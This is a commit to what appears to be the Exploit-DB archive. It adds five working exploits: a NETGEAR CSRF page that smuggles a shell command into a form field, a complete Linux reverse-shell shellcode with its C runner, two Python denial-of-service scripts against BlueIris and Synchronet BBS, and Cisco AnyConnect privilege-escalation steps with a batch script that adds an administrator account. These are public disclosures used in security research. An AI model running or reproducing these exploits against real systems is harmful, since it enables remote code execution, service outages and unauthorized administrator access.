DB: 2017-03-01

5 new exploits BlueIris 4.5.1.4 - Denial of Service Synchronet BBS 3.16c - Denial of Service Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation Linux/x86-64 - Reverse Shell Shellcode (84 bytes) NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery
2017-03-01 05:01:18 +00:00 · 2017-03-01 05:01:18 +00:00 · 7fa7a111c4
commit 7fa7a111c4
parent 026ded7298
6 changed files with 251 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5384,6 +5384,8 @@ id,file,description,date,author,platform,type,port
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8820,6 +8822,7 @@ id,file,description,date,author,platform,type,port
 41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15920,6 +15923,7 @@ id,file,description,date,author,platform,type,port
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37387,3 +37391,4 @@ id,file,description,date,author,platform,type,port
 41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
 41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
--- a/platforms/hardware/webapps/41472.html
+++ b/platforms/hardware/webapps/41472.html
@ -0,0 +1,26 @@
 # Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
 # Date: 2017-02-28
 # Exploit Author: SivertPL
 # Vendor Homepage: http://netgear.com/
 # Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
 # Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
 # Tested on: DGN2200v1,v2,v3,v4
 # CVE: CVE-2017-6366
 A quite dangerous CSRF was discovered on all DGN2200 firmwares.
 When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.
 <!DOCTYPE html>
 <html>
 	<title>netgear router CSRF</title>
 	<body>
 		<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
 			<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
 			<input type="hidden" name="lookup" value="Lookup">
 			<button name="clc" value="clc">Would You Dare To?</button> 
 		</form>
 	</body>
 </html>
 <!-- 2017-02-27 by SivertPL -->
--- a/platforms/linux/shellcode/41477.c
+++ b/platforms/linux/shellcode/41477.c
@ -0,0 +1,80 @@
 /*
 Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes
 Author: Manuel Mancera (@sinkmanu)
 Tested on: 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
 GNU/Linux
 ----------------- Assembly code -------------------
 section .text
        global _start
 _start:
        push 0x2d01a8c0                         ; Address (192.168.1.45)
        push word 0x5c11                        ; Port (4444)
        push word 2                             ; Address family -
 AF_INET (0x2)
        push 42                                 ; connect syscall
        push byte 16                            ; length
        push byte 41                            ; socket syscall
        push byte 1                             ; type - SOCK_STREAM (0x1)
        push byte 2                             ; family - AF_INET (0x2)
        pop rdi                                 ; family
        pop rsi                                 ; type
        xor rdx, rdx                            ; protocol
        pop rax                                 ; socket syscall
        syscall
        mov rdi, rax                            ; sockfd
        pop rdx                                 ; length
        pop rax                                 ; connect syscall
        mov rsi, rsp                            ; sockaddr
        syscall
        xor rsi, rsi
 loop:
        mov al, 33
        syscall
        inc rsi
        cmp rsi, 2
        jle loop
        xor rax, rax
        mov rdi, 0x68732f6e69622f2f
        xor rsi, rsi
        push rsi
        push rdi
        mov rdi, rsp
        xor rdx, rdx
        mov al, 59
        syscall
 ---------------------------------------------------
 $ nasm -f elf64 reverse-tcp-shell.asm -o reverse-tcp-shell.o
 $ ld reverse-tcp-shell.o -o reverse-tcp-shell
 $ objdump -d ./reverse-tcp-shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
 /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 "\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"
 $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 $ ./shellcode
 Length: 84 bytes
 */
 #include <stdio.h>
 #include <string.h>
 const char code[] =  \
 "\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
 int main()
 {
    printf("Length: %d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
 }
--- a/platforms/windows/dos/41474.py
+++ b/platforms/windows/dos/41474.py
@ -0,0 +1,31 @@
 import socket
 # Title: BlueIris - Denial of Service
 # Date: 2017-02-28
 # Exploit Author: Peter Baris
 # Vendor Homepage: http://www.saptech-erp.com.au
 # Software Link: http://blueirissoftware.com/blueiris.exe
 # Version: 4.5.1.4
 # Tested on: Windows Server 2008 R2 Standard x64
 # Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.
 buffer = "A"*5000
 port = 21
 s = socket.socket()
 ip = '0.0.0.0'             
 s.bind((ip, port))            
 s.listen(5)                    
 print 'Listening on FTP port: '+str(port)
 while True:
 	conn, addr = s.accept()     
 	conn.send('220 '+buffer+'\r\n')
 	conn.recv(1024)
 	conn.send('250 '+buffer+'\r\n')
 	conn.close()
--- a/platforms/windows/dos/41475.py
+++ b/platforms/windows/dos/41475.py
@ -0,0 +1,82 @@
 # Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
 # Date: 2017-02-28
 # Exploit Author: Peter Baris
 # Vendor Homepage: http://www.saptech-erp.com.au
 # Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
 # Version: 3.16c for Windows
 # Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64 
 # CVE : CVE-2017-6371
 import socket
 import time
 import sys
 try:
    host = sys.argv[1]
    port = 80
 except IndexError:
    print "[+] Usage %s <host>  " % sys.argv[0]
    sys.exit()
 exploit = "\x41"*4096
 buffer = "GET /index.ssjs HTTP/1.1\r\n"
 buffer+= "Host: 192.168.198.129\r\n"
 buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
 buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
 r\n"
 buffer+="Accept-Language: en-US,en;q=0.5\r\n"
 buffer+="Accept-Encoding: gzip, deflate\r\n"
 buffer+="Referer: "+exploit+"\r\n"
 buffer+="Connection: keep-alive\r\n"
 buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
 buffer+="Content-Length: 5900\r\n\r\n"
 i = 1
 while i < 957:
 	try:
 		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 		connect=s.connect((host,port))
 		print("[*] Try: "+str(i))
 		s.send(buffer)
 		s.close()
 		i=i+1
 	except:
 		print("[-] The service seems to be down\r\n")
 		break
 print("[i] Waiting a few seconds before starting a second attack.\r\n")
 time.sleep(25)
 print("[*] Second run to trigger the DoS")
 i = 1
 while i < 957:
        try:
 		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connect=s.connect((host,port))
                print("[*] Try: "+str(i))
                s.send(buffer)
                s.close()
                i=i+1
        except:
                print("[-] The service seems to be down.\r\n")
                break
 print("[i] Wait before the final strike.\r\n")
 time.sleep(25)
 print("[*] Third run to trigger the DoS")
 i = 1
 while i < 957:
        try:
                s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connect=s.connect((host,port))
                print("[*] Try: "+str(i))
                s.send(buffer)
                s.close()
                i=i+1
        except:
                print("[-] The service seems to be down.\r\n")
                print("[!] It can take a few seconds for the service to crash\r\n")
                break
--- a/platforms/windows/local/41476.txt
+++ b/platforms/windows/local/41476.txt
@ -0,0 +1,27 @@
 # Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
 # Date: 02/27/2017
 # Exploit Author: @Pcchillin
 # Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
 # Version: 4.3.04027 and earlier
 # Tested on: Windows 10
 # CVE : CVE-2017-3813
 # Vendor ID : cisco-sa-20170208-anyconnect
 #Run CMD.EXE with system privileges
 1. Start Cisco anyconnect from logon screen.
 2. Once the Cisco app comes up (where you can select a profile and hit connect) hold CTRL and hit B.
 3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can select Chrome if installed.
 4. Once Internet Explorer is started press CTRL-O, then select browse. Chrome press CTRL-O and explorer will open.
 5. You can then navigate to the C:\Windows\System32\ folder and find CMD.exe then right click and select RunAsAdministrator.
 #Run scripts from USB flash drive
 Follow steps from above and navigate to the flash drive right click and select run. You can also edit the document.
 Example bat script:
 Net user #USERNAME #PASSWORD /add
 Net localgroup administrators #USERNAME /add
 #Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
 #Twitter handle @pcchillin